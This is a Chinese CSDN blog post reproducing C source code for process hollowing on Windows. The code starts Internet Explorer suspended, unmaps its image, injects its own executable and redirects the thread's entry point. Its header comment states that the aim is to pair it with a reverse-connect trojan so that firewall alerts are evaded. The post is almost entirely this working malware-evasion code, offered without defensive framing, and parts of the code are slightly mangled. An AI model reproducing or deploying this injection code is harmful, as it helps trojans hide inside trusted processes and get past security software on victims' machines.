草牛傀儡进程代码

最新推荐文章于 2024-06-21 07:00:00 发布
最新推荐文章于 2024-06-21 07:00:00 发布
阅读量3.2k 收藏 1
点赞数
分类专栏: vcbcbdelphi的window编程 文章标签: null path header 防火墙 dos date
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2633128
版权 
*********************************************************************
    Author: Polymorphours
    Date: 2005/1/10    Modified by: XiCao
    Date: 2006/10/31
    另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的
    反向连接报警。
**********************************************************************/
#include <stdio.h>
#include <windows.h>
BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr); 
typedef 
struct _ChildProcessInfo {
DWORD dwBaseAddress;
DWORD dwReserve;
} 
CHILDPROCESS, *PCHILDPROCESS;
BOOL
FindIePath(
char *IePath,
int 
*dwBuffSize
);
BOOL 
InjectProcess(void);
DWORD
GetSelfImageSize(
HMODULE 
hModule
);
BOOL
CreateInjectProcess(
PPROCESS_INFORMATION 
pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);
char 
szIePath[MAX_PATH];
int main(void)
{
if (InjectProcess() 
)
{
    printf("This is my a test code,made by 
(Polymorphours)shadow3./r/n");
}
else
{
    
MessageBox(NULL,"进程插入完成","Text",MB_OK);
}
return 0;
}
BOOL 
FindIePath(OUT char *IePath, OUT int *dwBuffSize)
{
char 
szSystemDir[MAX_PATH];
GetSystemDirectory(szSystemDir,MAX_PATH);
szSystemDir[2] = 
'/0';
lstrcat(szSystemDir,"[url=file://program/]//Program[/url] 
Files//Internet Explorer//iexplore.exe");
lstrcpy(IePath, 
szSystemDir);
return TRUE;
}
BOOL InjectProcess(void)
{
char 
szModulePath[MAX_PATH];
DWORD dwImageSize = 0;
STARTUPINFO si;
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD 
*PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual 
= NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead 
= NULL;
HMODULE hModule = NULL;
ZeroMemory( szModulePath, MAX_PATH );
ZeroMemory( szIePath, MAX_PATH 
);
GetModuleFileName( NULL, szModulePath, MAX_PATH );
FindIePath( szIePath, 
NULL );
if ( lstrcmpiA( szIePath, szModulePath ) == 0 )
{ 
//当前运行在IE空间里
    return FALSE;
}
hModule = GetModuleHandle( NULL );
if ( hModule == NULL 
)
{
    return FALSE;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = 
(PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
dwImageSize = GetSelfImageSize(hModule);
// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程
if ( CreateInjectProcess(&pi, 
&ThreadCxt, &stChildProcess ))
{
    printf("CHILD 
PID: [%d]/r/n",pi.dwProcessId);
    // 
卸载需要注入进程中的代码
    if( UnloadShell(pi.hProcess, 
stChildProcess.dwBaseAddress) )
    
{
     // 重新分配内存
     lpVirtual = 
VirtualAllocEx(
      
pi.hProcess,
      
(LPVOID)hModule,
      
dwImageSize,
      MEM_RESERVE | MEM_COMMIT, 
PAGE_EXECUTE_READWRITE);
  
     if( 
lpVirtual )
     {
      
printf("Unmapped and Allocated Mem Success./r/n");
     
}
    }
    else
    
{
     printf("ZwUnmapViewOfSection() 
failed./r/n");
     return TRUE;
    
}
 
    if(lpVirtual)
    
{
     PPEB = (DWORD 
*)ThreadCxt.Ebx;
     // 
重写装载地址
     
WriteProcessMemory(
      
pi.hProcess,
      
&PPEB[2],
      
&lpVirtual,
      
sizeof(DWORD),
      
&dwWrite);
  
     // 
写入自己进程的代码到目标进程
     if ( 
WriteProcessMemory(
      
pi.hProcess,
      
lpVirtual,
      
hModule,
      
dwImageSize,
      &dwWrite) 
)
     {
      printf("image 
inject into process 
success./r/n");
   
      
ThreadCxt.ContextFlags = CONTEXT_FULL;
      if ( 
(DWORD)lpVirtual == stChildProcess.dwBaseAddress 
)
      {
       
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + 
pVirPeHead->OptionalHeader.AddressOfEntryPoint;
      
}
      else
      
{
       ThreadCxt.Eax = (DWORD)lpVirtual + 
pVirPeHead->OptionalHeader.AddressOfEntryPoint;
      
}
#ifdef DEBUG
      printf("EAX = 
[0x%08x]/r/n",ThreadCxt.Eax);
      printf("EBX = 
[0x%08x]/r/n",ThreadCxt.Ebx);
      printf("ECX = 
[0x%08x]/r/n",ThreadCxt.Ecx);
      printf("EDX = 
[0x%08x]/r/n",ThreadCxt.Edx);
      printf("EIP = 
[0x%08x]/r/n",ThreadCxt.Eip);
#endif
      
SetThreadContext(pi.hThread, &ThreadCxt);
      
ResumeThread(pi.hThread);
     
}
     else
     
{
      printf("WirteMemory 
Failed,code:%d/r/n",GetLastError());
      
TerminateProcess(pi.hProcess, 0);
     
}
    }
    else
    
{
     printf("VirtualMemory 
Failed,code:%d/r/n",GetLastError());
     
TerminateProcess(pi.hProcess, 0);
    }
}
return 
TRUE;
}
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD 
dwImageSize;
_asm
{
    mov 
ecx,0x30
    mov eax, fs:[ecx]
    mov eax, 
[eax + 0x0c]
    mov esi, [eax + 0x0c]
    
add esi,0x20
    lodsd
    mov 
dwImageSize,eax
}
return dwImageSize;
}
BOOL 
CreateInjectProcess(
        
PPROCESS_INFORMATION pi,
        PCONTEXT 
pThreadCxt,
        CHILDPROCESS 
*pChildProcess )
{
STARTUPINFO si;
DWORD *PPEB;
DWORD read;
// 使用挂起模式启动ie
if( CreateProcess(
    
NULL,
    szIePath,
    
NULL,
    NULL,
    0,
    
CREATE_SUSPENDED,
    NULL,
    
NULL,
    &si,
    pi 
))
{
    pThreadCxt->ContextFlags = 
CONTEXT_FULL;
    GetThreadContext(pi->hThread, 
pThreadCxt);
 
    PPEB = (DWORD 
*)pThreadCxt->Ebx;
    // 得到ie的装载基地址
    
ReadProcessMemory(
     
pi->hProcess,
     
&PPEB[2],
     
(LPVOID)&(pChildProcess->dwBaseAddress),
     
sizeof(DWORD),
     &read 
);
 
    return TRUE;
}
return 
FALSE;
}
BOOL UnloadShell(HANDLE ProcHnd, unsigned long 
BaseAddr)     
     
typedef unsigned long (__stdcall *pfZwUnmapViewOfSection)(unsigned long, 
unsigned long);   
     
pfZwUnmapViewOfSection ZwUnmapViewOfSection = NULL;
     BOOL res = 
FALSE;   
     HMODULE m = 
LoadLibrary("ntdll.dll");   
     
if(m)
{   
         
ZwUnmapViewOfSection = (pfZwUnmapViewOfSection)GetProcAddress(m, 
"ZwUnmapViewOfSection");   
         
if(ZwUnmapViewOfSection)   
             
res = (ZwUnmapViewOfSection((unsigned long)ProcHnd, BaseAddr) == 
0);   
         
FreeLibrary(m);   
      
     return res;
}
iiprogram
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows傀儡进程实现C++代码
04-28
本项目"Windows傀儡进程实现C++代码"是使用C++编程语言在Visual Studio 2008环境下编写的,旨在提供一种方法来创建和管理傀儡进程,以满足系统级服务或者应用程序的需求。 首先,我们要理解傀儡进程的基本概念。在...
一个bug引发惨案!成功追回损失后,拼多多还应做什么?
人邮异步社区
01-23 1000
  1月20日凌晨,互联网销售平台拼多多遭遇了“优惠券Bug”:网站每一位注册用户可以通过微信渠道、网页端、QQ渠道等,领取面值为100元的优惠券,该优惠券适用该网站的商品,有效期为一年。随后,有网友曝出,用领取的优惠券可以充值话费、Q币。上午9点,网友发现拼多多已将相关优惠券全部下架,直至10点左右,该漏洞才被拼多多官方修复。并网传拼多多一夜损失近200亿元,一时引起广泛关注。而拼多多的这一“...
傀儡进程详解
N阶二进制的博客
06-21 482
傀儡进程是一种高级的隐蔽技术,攻击者利用进程注入、进程替换和隐藏技术,伪装成合法进程进行恶意活动。理解这些技术及其防范措施对于保护系统安全至关重要。希望通过此详解和示例,大家能更好地理解傀儡进程的工作原理和防范方法。
一个bug引发惨案!成功追回损失后,拼多多还应做什么? ...
weixin_34162228的博客
01-23 228
1月20日凌晨,互联网销售平台拼多多遭遇了“优惠券Bug”:网站每一位注册用户可以通过微信渠道、网页端、QQ渠道等,领取面值为100元的优惠券,该优惠券适用该网站的商品,有效期为一年。随后,有网友曝出,用领取的优惠券可以充值话费、Q币。上午9点,网友发现拼多多已将相关优惠券全部下架,直至10点左右,该漏洞才被拼多多官方修复。并网传拼多多一夜损失近20...
外企程序员常用英语单词
热门推荐
杜继恒的博客
01-03 3万+
1, cognitive ['kɒɡnɪtɪv] adj. 认知的,认识的 2, risk [rɪsk] n. 风险;危险;冒险 vt. 冒…的危险 n. (Risk)人名;(英、阿拉伯)里斯克 3, berries ['beriz] 浆果类 4, vegetables [ˈvedʒtəblz] n. [园艺] 蔬菜(vegetable的复数形式);菜类 5, leafy ['liːfɪ...
Cmdb_Puppet:傀儡代码示例
07-03
Cmdb_Puppet 傀儡代码示例#cmdb --cmdb 代码 #gethostinfo --Client 主机信息 #puppet_agent --puppet 代理配置 #puppet_master --puppet 服务器配置
工具傀儡.jar
07-28
放入mod文件夹下即可,但注意在联机下这个mod会攻击其他联机玩家。
易语言注入DLL置目标进程
07-22
易语言注入DLL置目标进程源码,注入DLL置目标进程,InjectDll,SwingingWindow,CloseHandle,GetProcAddress,OpenProcess,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CopyMemory
傀儡SQL批量扫描注入工具
07-14
傀儡SQL批量扫描注入工具详解》 在网络安全领域,SQL注入是一种常见的攻击手段,它利用网站应用程序对用户输入的数据处理不当,恶意篡改SQL查询语句,获取、修改、删除数据库中的敏感信息。为了防御这种攻击,...
java毕业作品-JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
08-03
java毕业作品_JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入 刷之前备份原bios避免翻车
08-03
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入。刷之前备份原bios避免翻车
第5章 传输层 计算机网络思维导图,结合学习通作业
08-03
计算机网络思维导图,结合学习通作业,方便备考复习。
Navicat 的主要功能、使用方法和常见问题.md
08-03
Navicat 的主要功能、使用方法和常见问题.md
JAVA002打飞机游戏设计(程序+论文).zip
08-03
这是“JAVA002 打飞机游戏设计(程序+论文)”,仅供学习参考,请勿商用。
某电信数据重点工作汇报.pptx
08-03
某电信数据重点工作汇报.pptx
深度学习数据集:7种番茄叶片病害缺陷图像分类(包括划分好的数据【文件夹保存】、类别字典文件、可视化python脚本)
08-03
【分类个数:7】番茄花叶病毒、tomato_septoria_leaf_spot、tomato_bacterial_spot(详情请查看json字典文件) 如果想可视化数据集,可以运行资源中的show脚本。 【数据集详情】data目录下分为2个目录,训练集和验证集。存放各自的同一类数据图片。训练集图片总数18k左右,验证集图片总数8k左右。 可以用作yolo或者CNN卷积神经网络的深度学习分类数据集 CNN分类网络项目:https://blog.csdn.net/qq_44886601/category_12056269.html
IBM-某大型集团流程优化与系统实施项目.pptx
最新发布
08-03
IBM-某大型集团流程优化与系统实施项目.pptx
傀儡sql注入批量扫描工具
11-03
工具会自动发送带有特殊注入代码的请求,以尝试从数据库中获取未经授权的数据。如果网站存在注入漏洞,工具将会提供相应的警报或报告。 使用傀儡SQL注入批量扫描工具的好处是可以快速发现并修复潜在的漏洞。通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值